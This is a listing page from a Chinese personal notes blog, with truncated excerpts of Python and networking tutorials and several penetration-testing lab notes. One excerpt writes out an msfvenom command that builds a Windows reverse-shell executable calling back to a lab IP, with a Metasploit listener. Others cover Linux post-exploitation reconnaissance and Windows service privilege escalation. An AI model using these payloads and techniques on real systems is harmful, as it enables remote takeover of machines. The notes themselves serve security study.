最新发布第26页
Rookie Mistake   JWT SSTI-白鸢的笔记

Rookie Mistake JWT SSTI

简介point 20Rookie MistakeDifficulty INTERMEDIATErated by community HARD Beginner's luck 实验环境攻击者 Kali 192.168.45.159受害者 IP 192.168.153.221 Linux 1. 信息收集收集受害者...
Python数据容器 列表-白鸢的笔记

Python数据容器 列表

1.列表的定义#字面量[元素1,元素2,元素3,元素4,...]#定义变量变量名称=[元素1,元素2,元素3,元素4,...]#定义空列表变量名称=[]变量名称=list()列表内的每一个数据,称之为元素以[]作为标...
zhyann的头像-白鸢的笔记钻石会员zhyann2年前
0448
ARP协议-白鸢的笔记

ARP协议

1. 前言网络设备有数据要发送给另一台网络设备时,必须要知道对方的网络层地址(即IP地址)。IP地址由网络层来提供,但是仅有IP地址是不够的,IP数据报文必须封装成帧才能通过数据链路进行发送...
zhyann的头像-白鸢的笔记钻石会员zhyann2年前
0449
实验-白鸢的笔记

实验

1. 获取一个Meterpreter shellmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.192.128 LPORT=3333 -f exe -o reverse.exe 2. 在Kali使用handler模块建立监听use exploit/multi/hand...
Python数据容器 序列的切片操作-白鸢的笔记

Python数据容器 序列的切片操作

序列的常用操作 - 切片序列支持切片,即:列表、元组、字符串,均支持进行切片操作切片:从一个序列中,取出一个子序列语法:序列[起始下标:结束下标:步长]表示从序列中,从指定位置开始,依...
zhyann的头像-白鸢的笔记钻石会员zhyann2年前
04415
赋值和排序操作-白鸢的笔记

赋值和排序操作

准备数据import pandas as pd stock_data = pd.read_csv('/root/Documents/stock_data.csv') print(stock_data) 1. 赋值操作stock_data['volume'] = 100 print(stock_data)都变成了100或者使用...
Python循环语句 while循环-白鸢的笔记

Python循环语句 while循环

1.while语句的基本语法i = 0 while i < 10: print(i) i += 1 2.while循环嵌套实例:while循环打印9*9乘法表1*1 = 11*2 = 2 2*2 = 41*3 = 3 2*3 = 6 3*3 = 91*4 = 4 2*4 = 8 3*4 = 12 4*4 = 1...
zhyann的头像-白鸢的笔记钻石会员zhyann2年前
04311
从命令行管理文件2-白鸢的笔记

从命令行管理文件2

文件操作命令1. 显示当前工作目录每个shell和系统进程都有一个当前的工作目录CWD:current work directory显示当前shell CWD的绝对路径pwd命令:printing working directory范例:[18:58:36 root...
zhyann的头像-白鸢的笔记钻石会员zhyann2年前
0435
Linux信息收集:ARP缓存 查看登录 敏感文件-白鸢的笔记

Linux信息收集:ARP缓存 查看登录 敏感文件

1. ARP缓存查看ARP缓存(IP地址和MAC地址的映射关系)得到与同一网段中哪些主机进行通信,进而描绘出网络的拓扑从而可以对其他主机进行横向渗透测试arp -a arp -e┌──(root㉿kali)-[~] └─# ...
Windows服务漏洞利用-覆盖服务的可执行程序-白鸢的笔记

Windows服务漏洞利用-覆盖服务的可执行程序

在“Windows服务漏洞利用-利用错误的服务权限进行提权”一章中在我们拥有更改服务配置的权限假设我们没有这些权限(SERVICE_CHANGE_CONFIG)但是我们拥有更改服务可执行文件的权限。换句话说我...